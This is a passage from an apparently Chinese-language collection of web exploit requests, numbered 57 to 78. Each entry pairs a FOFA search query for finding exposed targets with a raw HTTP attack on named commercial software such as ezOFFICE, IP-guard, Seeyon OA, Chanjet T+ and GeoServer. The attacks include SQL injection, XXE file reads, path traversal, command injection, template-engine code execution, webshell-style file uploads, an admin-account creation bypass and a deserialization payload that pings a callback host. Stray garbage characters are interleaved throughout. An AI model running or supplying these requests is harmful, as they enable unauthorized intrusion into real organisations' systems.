3 C1 ~/ C4 N5 ]9 W9 K( x3 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
; P& l) `, V4 L6 sContent-Type: application/json
! O- b1 H/ G7 ^: Z1 D. p) l
: J8 v) s# l7 r: N8 I{
8 w9 f1 `( Q( [+ ^: a$ ^1 A2 d "storeID":{) X- p% k# F3 l' e1 A
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",& x0 o- {2 n+ C
"MethodName":"Start",
" _ @2 s0 {* T. W; o( C" x "ObjectInstance":{2 p$ l: G8 [/ D- Q+ V
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",$ b; M+ V( ` h8 W0 h6 W, z
"StartInfo": {
. J" Z2 a9 C) z4 d$ b "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 z. U4 T- l5 k- z" `0 C) j "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"1 _+ Z n; V+ O& \$ |
}$ Z+ ]8 w2 x" V+ Q( h! [# \0 A, ?% @
}9 w6 c" \$ H& v. G I
}+ Y' a/ p" z# V
}* m( u7 n7 f- L0 h
# o% [5 V1 Y, v: x' o! R
# p6 h7 @! p! y57. 畅捷通T+ keyEdit.aspx SQL注入) P$ n: N8 k; H/ f* A# ~
FOFA:app="畅捷通-TPlus", j2 Z$ H# W! m1 O
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
" \$ ]5 T. n$ e/ D% V2 h. MHost: host7 e. b4 F4 p; H( [& n
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36 Z6 |8 P* k. V$ \- u
Accept-Charset: utf-83 s: R9 u" w3 b+ l$ `
Accept-Encoding: gzip, deflate4 j; ]7 M5 z" Q7 d
Connection: close
% i. P' W* O. f3 b% H/ F; I: A
, c2 k) g3 }0 \& w5 F/ } [3 b, ]; Q- y( o
58. 畅捷通T+ KeyInfoList.aspx sql注入
* v0 W* F$ B/ fFOFA:app="畅捷通-TPlus"
$ c5 Y+ u9 u+ B* {. A) j/ `* sGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
7 i( e) j5 }) D- L2 t; ?8 o1 @3 o uHost: your-ip! g3 o k6 V' i( x; l; c, k: I0 E
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.365 Y$ H- F6 ^% T2 P3 e0 R3 |
Accept-Charset: utf-8/ Z7 c( x% n9 l p
Accept-Encoding: gzip, deflate5 G6 @/ z D1 Y' p6 f$ G
Connection: close- ^, h4 s2 I0 f F0 k, h
" |) G% z9 a Z3 E! }
! f7 `- {- x( t \) {( R7 c8 v59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行" E) }8 s) r r+ I# Q0 Y( ^
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
# ?/ y1 S# Y: O7 v6 C4 rPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.17 Q# C- K8 {- |
Host: 192.168.86.128:9090& I2 o0 n3 R! u6 B
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36; F8 q' ]2 |$ ~+ M" e# [
Connection: close
* W1 |0 F' Y+ N; w1 \. oContent-Length: 16695 U7 N/ e- ]( s6 r8 l& L
Accept: */*2 w5 C( Q* u. @0 n. R, t
Accept-Language: en. H) P7 O d" M8 q
Content-Type: application/x-www-form-urlencoded/ Z/ a& F% h9 k+ l
Accept-Encoding: gzip) V& i2 U1 b2 w( {, c
( {& w3 a; G* A9 d5 z6 C$ rPAYLOAD8 Z7 [5 w% B. F* V3 F
/ [3 R$ F) K. g! n% W
+ R& C$ a4 j0 S
60. 百卓Smart管理平台 importexport.php SQL注入 T, N R2 k8 T8 n
FOFA:title="Smart管理平台"
0 P5 V' A3 q! C; j7 S( d1 WGET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
$ `* i" R: T" C( | w0 oHost:# C6 ~% D1 v4 m4 p- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( Z/ v+ {4 D+ M# ?! ^4 ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) @ z7 `0 @: b+ ^1 \3 x
Accept-Encoding: gzip, deflate# ~8 _$ [. d0 \/ ]. I+ Z. W; P
Accept-Language: zh-CN,zh;q=0.9
: c6 b: L* ~# y' FConnection: close
% G* N$ m! u5 J# [: ]. Y
/ I# n/ C9 W* N p4 w
3 G% E8 A$ ?! d3 i( d% _+ ~, q! B61. 浙大恩特客户资源管理系统 fileupload 任意文件上传! C: X0 _6 l9 g6 ?6 J5 X
FOFA: title="欢迎使用浙大恩特客户资源管理系统" [* O$ u. ` }& S0 x& V/ F7 M
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1. Y9 f# Y4 R, B* J% ]/ J
Host: x.x.x.x
% X& g" j! u3 f5 u/ o h- X I. dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
3 T1 a* q) r' f% A4 hConnection: close. ?( R. |$ X- a2 N
Content-Length: 27
: {* N9 K( |0 B; HAccept: */*
! K6 D7 `9 R, u$ L; l" dAccept-Encoding: gzip, deflate
- L, s Z% @( ^+ WAccept-Language: en3 x7 l! l" S9 A1 B( w
Content-Type: application/x-www-form-urlencoded% d) G6 Q) Y5 q
) h( ?# U: d1 c. G# t/ H/ L
8uxssX66eqrqtKObcVa0kid98xa
! o6 B8 r! h/ L2 F
$ _$ y, _8 V% c
" u0 o, i+ A8 H5 A+ E62. IP-guard WebServer 远程命令执行2 C9 x4 Z9 j2 X, A' A0 e! u0 x
FOFA:"IP-guard" && icon_hash="2030860561"
# F+ U$ i+ Q5 Q; }$ O8 ]GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.11 H1 K+ P7 q) t+ i0 g, N. [
Host: x.x.x.x& j& g: a4 G' E7 y, I2 w
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.365 {6 i/ ?3 V8 t/ `4 Y
Connection: close7 y) |. u6 c; v7 c3 R/ c# ^
Accept: */*
$ w) D8 E6 H8 w8 e, {8 v& lAccept-Language: en
3 P' N4 f* { `, T6 _% ]% Q/ VAccept-Encoding: gzip
/ D6 y5 S- d( M+ ?, ]( K& u5 V) f4 Z, k5 K
2 ]$ S# W5 a0 E) u" e, q
访问2 ]4 r0 d4 J1 B+ v& \' U: v5 L
: b+ y0 C$ W/ ?9 P' g. u9 y
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
& }* s) h7 H( q$ NHost: x.x.x.x2 {: K6 s. ]8 m; V7 F1 ]
8 l- h, ]# S" Z' L- |' b* H
X/ K4 [1 r8 @
63. IP-guard WebServer任意文件读取+ e( T# [6 U3 A% s; z4 B" w
IP-guard < 4.82.0609.0( W# C9 a8 I, W! }+ G% y! I, _# P
FOFA:icon_hash="2030860561"
3 V% n6 f7 V0 t. \5 L9 C- Z; W" F7 R7 OPOST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1- S8 T3 [6 f% F {+ v& x2 W
Host: your-ip
5 ^/ \, ] S& N+ KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.369 F9 |' W; c3 s* `& B
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% N* i6 K# N1 Q! y& nAccept-Encoding: gzip, deflate0 T/ k0 `8 h& _3 |
Accept-Language: zh-CN,zh;q=0.9; x5 D/ ~5 f7 S |% S' R
Connection: close% V+ {# U8 H; R& s8 _+ \
Content-Type: application/x-www-form-urlencoded
G! [8 D3 @: M3 p6 q# ^+ m. h
+ K) a: y. R2 c& gpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A H: k& V8 _. D M$ s
4 u u" O0 K$ q6 K1 B2 F
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
% [. ^$ e; q* H7 }FOFA:body="/Scripts/EnjoyMsg.js"! {7 J( A; R2 G
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
( ~* a2 Y+ v8 g* U. yHost: 192.168.86.128:9001
% I) f u8 D9 s( j$ Z# A- n) bUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
4 j) m$ P5 B# Z$ T% O4 p* k5 {5 DConnection: close& h8 k' \7 {+ w6 l+ {& p$ Z+ V9 }
Content-Length: 369
: |) @8 c" s6 O1 ?% ^; pAccept: */*5 n! I; @! A6 i
Accept-Language: en) W! E$ @5 B2 ?1 _* n! v, Y# G
Content-Type: text/xml; charset=utf-8
; J4 r. W4 S$ ^; T q+ SAccept-Encoding: gzip5 n( k" S! f9 m! b7 l% A q
; i1 \. v! R8 g( N
<?xml version="1.0" encoding="utf-8"?>
; f' X- U6 i$ I<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">0 `) g$ O+ q! R5 Q, C+ `
<soap:Body> n1 k& @, v' Q( a5 Y v
<GetOSpById xmlns="http://tempuri.org/">
. K7 G* p7 i: H9 L <sId>1';waitfor delay '0:0:5'--+</sId> m7 K+ E5 U) B( |! v& C; X
</GetOSpById>
+ v5 m; r. j! a. g% [% s+ a' |# z </soap:Body>- g9 G" u3 ^$ c
</soap:Envelope>
* D1 Z! v |. Q4 K# n& \& K p, E! l! V7 Y% U* j' S( M7 Y
4 N7 A6 b3 h& d) S65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
( c4 G' K8 d% u" u, G* nFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"! g* T; b# r+ ~
响应200即成功创建账号test123456/123456/ A/ v* K. I% U
POST /SystemMng.ashx HTTP/1.13 s* s0 P1 A& E8 X" \
Host:
- F3 S% }6 |; m# j4 zUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
- d- D; O5 i3 n7 [6 i, i- sAccept-Encoding: gzip, deflate
9 d1 R# N# F- m% {. f7 G6 SAccept: */*5 U: o2 Q' r& G$ s8 O% e |; q
Connection: close
, E- o5 d$ T" T/ AAccept-Language: en
# b+ k% t" K5 T# o4 u" kContent-Length: 1743 o# k t3 f) ]* P0 }; _- K
# g" S- c6 ~8 LoperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators$ s4 o4 z" [. G" X( Z2 [
, s( E+ e4 b% O8 U- k' q5 B
9 F% R2 L: Y, V. \
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
5 A/ o1 Q. y% lFOFA:app="万户ezOFFICE协同管理平台"
/ P! V$ U3 y q* `. A( n F/ e4 B* v0 a1 b# }
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1, T7 n/ k2 M- i( ?; i
Host: x.x.x.x
8 y. z! ~, W0 q6 ]5 h- oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36" ~4 m4 r' t# Q% h; P7 q& S z+ H; R$ _2 x
Connection: close2 ^. s+ i3 E7 U6 @
Accept: */*
; `& e/ k+ S- Z, h* M0 U2 tAccept-Language: en) V# W& W) a5 f* n. p6 s" q9 F
Accept-Encoding: gzip
: w( `# E# Z {+ ^- H; F9 B, o) v$ `$ M& v- p2 k
* D K2 a/ L' L$ [2 Q: J5 z
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在6 C8 Q% o% C% }8 F; i% |, t+ N
- I) L: g! _+ E! u z @# R- _67. 万户ezOFFICE wpsservlet任意文件上传$ R% e- E) t3 Z3 W$ U, x% Y7 A
FOFA:app="万户网络-ezOFFICE"3 L+ m5 a# J+ c) `+ Q
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型; m1 E, R3 m# M" X& ]
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
" C1 @7 f+ a3 \3 z$ _Host: x.x.x.x. y+ W* l0 z8 P- T8 f2 {& a- j
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
/ s) S9 } G5 u FContent-Length: 173
% x( p! v7 _& C4 F/ i. G8 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.84 C6 P# I# e( D9 h5 L) C
Accept-Encoding: gzip, deflate" X% @0 E& t8 m% C; s
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.32 z8 B% F# ^7 q, W
Connection: close
& C% f% x- e( BContent-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp6 E5 D' T. A/ S
DNT: 11 n* h( H4 A0 E k" x, ~
Upgrade-Insecure-Requests: 1
, y5 y2 p: i+ Z) O6 D8 d1 g3 S* ?# O; S6 H
--ufuadpxathqvxfqnuyuqaozvseiueerp
2 S1 r& B! ?' t1 S* t J7 `3 O" tContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"6 n% a! h/ r: U( A/ c( c
4 v* }/ a5 z# S; Q5 h+ d g
<% out.print("sasdfghjkj");%>
9 C1 |- R3 t; h1 M+ M* E8 X--ufuadpxathqvxfqnuyuqaozvseiueerp--# E1 I9 |5 g" q
1 `2 S: `$ W1 ^2 s3 v
" G) b: g# L7 n/ ]6 ^8 L y B
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp( f. Y2 l* J W3 p3 t
) U5 ]0 Z3 g6 c/ L6 a V6 b68. 万户ezOFFICE wf_printnum.jsp SQL注入* @, A' v6 A' s$ ~9 w" z' U
FOFA:app="万户ezOFFICE协同管理平台"
; O' _) t1 o- S5 V6 OGET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1/ h+ N# Q" W, K2 r5 ~) R$ ]
Host: {{host}}# W1 j, `4 P9 @) i/ |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
' g/ O& @. _ U& ]. D5 n- qAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
4 i3 a& W; P* [6 i0 g. YAccept-Encoding: gzip, deflate
! ]0 K9 M+ r' `0 lAccept-Language: zh-CN,zh;q=0.9 u& D1 ~9 d9 F& S
Connection: close
6 o" G- p% m' I j% M9 S( s
2 N7 _+ |0 F# P) O; b b
2 G: H2 @4 I; K: \ O7 @$ a+ s3 ]6 V69. 万户 ezOFFICE contract_gd.jsp SQL注入
! b/ _3 T8 [$ iFOFA:app="万户ezOFFICE协同管理平台"" y$ j3 J* A9 h& X1 q3 w5 M
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.14 A3 h. f) P+ l) L# }
Host: your-ip5 Y [+ |" S+ O
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
8 R* {" E- V9 J l0 r" gAccept-Encoding: gzip, deflate
/ U% y( Y0 i* E3 g* L8 {8 rAccept: */* Z! V: F6 Q; s: j
Connection: keep-alive3 c5 P0 S) L" h+ u
/ _! `: Z' R+ Y- M- j5 [' J( X! g! z/ _
70. 万户ezEIP success 命令执行
$ i. n+ x7 ~: C8 f+ rFOFA:app="万户网络-ezEIP"+ H% i D* e& V. k3 A3 a" J
POST /member/success.aspx HTTP/1.10 a8 z$ m/ t- Q+ \' f$ z% ^4 P
Host: {{Hostname}}
1 F& O i$ |3 C) E- p7 X1 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36( q( T( B9 u& q" y
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=) Y V, ^0 \+ b5 `' U H- n. B
Content-Type: application/x-www-form-urlencoded
+ N9 H% U0 ^" W5 s1 lTYPE: C7 q9 \+ N* d2 j3 i5 E \( E
Content-Length: 16702/ J! t" J& U4 X" B3 X4 T
% Y# s( U4 j5 g1 s: ^5 H
__VIEWSTATE=PAYLOAD
: J! g0 T) c. n# N9 t$ E0 l
3 i2 c( u( s4 y4 \1 P: A
K) f& e1 ]/ ?: ?71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入, C3 T4 Y/ n3 p1 ]& u; X
FOFA:body="PM2项目管理系统BS版增强工具.zip"
0 u3 l, [' R+ k8 oGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
, @6 k7 I- n' ~! A7 gHost: x.x.x.xx.x.x.x* w5 V! u# y* }- m9 W
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36- `( `. h) |& }! U0 N
Connection: close% S+ u# r- H k( i1 g7 Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; g: \3 |# r+ W1 E( h2 D& B* u
Accept-Encoding: gzip, deflate
! s* D; x* z7 ]9 G! BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 Z' V& T: E: M( L+ @0 L
Upgrade-Insecure-Requests: 1$ c$ C# C5 U* Z- T! Y/ x3 p. d
5 J+ N$ c$ {- W* a! B) T: o
! ]2 U$ ], K# L72. 致远OA getAjaxDataServlet XXE) h! H8 ~- E9 t2 h4 h8 s; P
FOFA:app="致远互联-OA"# C9 G# r. q* W8 u4 @3 ?2 Z# h
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
6 t+ S# g: l; i- G* NHost: 192.168.40.131:80993 Z/ b1 Z1 q9 _
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
1 {$ y- |: m: \4 lConnection: close
2 Z! A: \* E/ r, RContent-Length: 583) s/ n' F. a# I5 b8 E
Content-Type: application/x-www-form-urlencoded
5 V4 o. q& B6 G* \9 j4 i' EAccept-Encoding: gzip
( p$ M7 V, q0 F! ?% r9 U/ d& |0 H/ h% Y
S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E# v+ Z' k% @$ `2 C
' m3 [3 Q: S* z. K/ O# g4 g
% T' D k- a+ F73. GeoServer wms远程代码执行& w0 h7 l' z) [- Z1 x/ Z; e; R( _5 ^7 O! z
FOFA:icon_hash=”97540678”. b N4 z3 i) j; p. O# G; u+ M. }
POST /geoserver/wms HTTP/1.11 @9 s! {& V4 |4 W
Host:
1 e# S2 Z, U+ ]/ c, {) I( m3 _; M3 @" CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36- m9 u" E% C. w& s
Content-Length: 1981
w7 h4 j. V, I" U5 r N+ KAccept-Encoding: gzip, deflate/ X! R# g2 X' ]. q
Connection: close
2 G6 f& z0 Y) c) H& t1 Z2 V5 N# v0 J tContent-Type: application/xml
+ o/ `/ _# Q, Y5 A0 ]- r, MSL-CE-SUID: 3 c& |0 `+ S: z7 ~1 m+ \5 C" m+ u
. S1 z4 c/ }6 u1 h: P9 p0 f& C
PAYLOAD1 K. \& b# n) q8 p7 J6 n
6 b; V' E' C8 t2 _1 Q" I$ z4 Y
0 w4 J/ `/ R4 t! {5 b74. 致远M3-server 6_1sp1 反序列化RCE8 S. Q a8 r- k. x% C) r6 w, A
FOFA:title="M3-Server"( x* {9 L+ g4 N! {$ H( N6 g+ B
PAYLOAD, ?2 V8 I! e3 s- K$ E' u6 `
4 [9 [: k& R' W& j$ ]' t* } k2 I
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
- c9 G; ]- i4 |7 X. f2 ` SFOFA:app="TELESQUARE-TLR-2005KSH"; S J8 M! j1 F0 z k; e9 H
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
$ Y& x# ^$ }) @3 {Host: x.x.x.x
' r0 t- J/ N8 T1 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 H/ f9 L$ X+ L; A$ {0 T
Connection: close
+ ]- t6 x1 V$ \# d" p7 y. HAccept: */*" s" q# J& `4 U' [! _% H) w, i
Accept-Language: en9 e: b; l. E: }! O, c, C
Accept-Encoding: gzip& d5 c/ |2 g3 h3 Z
/ V8 E* S9 v1 d
/ w4 b) \% t+ j9 q/ z
GET /cgi-bin/test28256.txt HTTP/1.1( H8 @8 m' {+ e( m `
Host: x.x.x.x6 }# f6 A' b8 _/ d- K4 N, b
3 Q1 D- N6 R9 J ~
9 w! ^ U7 c- h+ t3 d& W6 `: i
76. 新开普掌上校园服务管理平台service.action远程命令执行1 ^; L5 a ?; @
FOFA:title="掌上校园服务管理平台"
; a0 {* e# L9 W! v/ e, JPOST /service_transport/service.action HTTP/1.1
1 H: U! r/ F9 S# x! E9 O% [7 fHost: x.x.x.x7 z' R C" ]$ s, L0 }% m- s# V6 e8 \; b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0* X1 s% j, I+ i9 c$ A; x4 }
Connection: close
- q6 J8 p: j" a. IContent-Length: 2115 ~0 f2 V8 D& o4 |. u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; N! t" e( S. w i- N; h
Accept-Encoding: gzip, deflate
" C! ~7 ?8 v' d$ s e7 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* _; A$ e Q6 q x5 \) m0 k5 W. JCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4* n6 r) [$ Z0 D6 M3 u8 x
Upgrade-Insecure-Requests: 1# G" X# e& ?" c# s
6 E; O* G# D, {: J
{
2 [* l. Y9 s" c# H4 S: q"command": "GetFZinfo",
' M0 \& e6 M# e$ q& r' d* P% m "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\") {5 {7 K5 z+ R8 g
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"3 Z U9 @( N, _
}1 Y* V8 v8 J3 H; }; Y
: o# f1 ^2 T% ~8 Q( _: ^
! G5 q) o$ U+ ], o. c; z
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.16 ~2 L' e% u3 M1 R0 j, Z9 e
Host: x.x.x.x
. W+ B* w+ e x8 F
% T+ Q" @, i$ C; A- h5 ~: k9 _9 x2 D; i) r& o
R* @/ M' q6 g) f" M3 ~* S77. F22服装管理软件系统UploadHandler.ashx任意文件上传7 e" i+ w' X& G' a+ f: ], Y4 D
FOFA:body="F22WEB登陆"
5 q4 n6 Q5 L1 T0 iPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1; n* t3 W3 X" p+ y
Host: x.x.x.x
1 M* @9 L- z" ~$ b5 hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.366 J) @* z, P; t, `0 H) ]
Connection: close
; }5 |% l0 t6 e, {5 z0 |; BContent-Length: 433! m: t0 }7 J8 B: L- H1 P
Accept: */*1 i+ E( O4 v9 v' b) n% Y5 h
Accept-Encoding: gzip, deflate" I% T0 S# l/ s4 F& m. [6 ]3 g
Accept-Language: zh-CN,zh;q=0.90 G# P ?! r+ a( h
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix
7 I9 }; K/ N) e7 O' r: `& a: q. x9 u V4 p8 I8 h
------------398jnjVTTlDVXHlE7yYnfwBoix
: y; A6 W t* T5 g; I6 v0 e3 G1 pContent-Disposition: form-data; name="folder"( I% A8 w, v7 J% ^: \2 D# L
0 T# F7 {0 J7 t/upload/udplog9 l0 ?0 l+ H4 w/ l: Z# h. ~; V( S
------------398jnjVTTlDVXHlE7yYnfwBoix7 ?. a6 D& |7 d6 X' ?
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
& H$ k) S) e; t$ Y9 t- [$ ~6 \Content-Type: application/octet-stream( v' }, M) t; [; J0 C- u' A4 I; m
! m6 T& S. r7 |, W6 P" yhello1234567
; Z6 y! Y8 |( Q8 _, u" f' Y------------398jnjVTTlDVXHlE7yYnfwBoix0 ?8 D7 F3 P" S( H1 h4 i
Content-Disposition: form-data; name="Upload": E5 O8 \0 l+ z. |: m9 Z. o- h }
1 I0 Y6 B) Y% v: L" K: @
Submit Query7 \2 n) n% i( ]+ @ `
------------398jnjVTTlDVXHlE7yYnfwBoix--/ l) j! g2 c6 T+ u+ B
9 Y( N7 }9 F1 i. ?. F4 d8 p4 ]! j* }
0 ~( j6 _* }& O6 n/ O: m78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 w3 {* T) O+ A3 S: t" U2 vFOFA:icon_hash="2001627082"; Y- B" u: T8 R; ]6 Y
POST /Platform/System/FileUpload.ashx HTTP/1.1: U3 t) f% A5 H- a
Host: x.x.x.x8 A) {0 w5 x ?; P
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% [' ?, A. K0 U6 J7 \Connection: close* w1 C+ J" w1 x) A ?
Content-Length: 336$ V% m1 A# [3 {# p
Accept-Encoding: gzip
/ |' M1 V6 b" c! J( WContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l; Q# Z q) ~( o) W
7 o; G7 d) ?; y) X) ], c) F' M! t8 [------YsOxWxSvj1KyZow1PTsh98fdu6l) Y7 _7 y+ w; u7 t8 y, [; F' N0 B
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
; o/ m: N a8 o$ wContent-Type: image/png
" k& x2 E9 y4 c) v2 [7 A& ]3 m2 M& Q) R3 m% X4 p
YsOxWxSvj1KyZow1PTsh98fdu6l& M0 t! C0 c9 q9 _
------YsOxWxSvj1KyZow1PTsh98fdu6l b6 K8 @0 c$ g! Z9 f5 J
Content-Disposition: form-data; name="target"
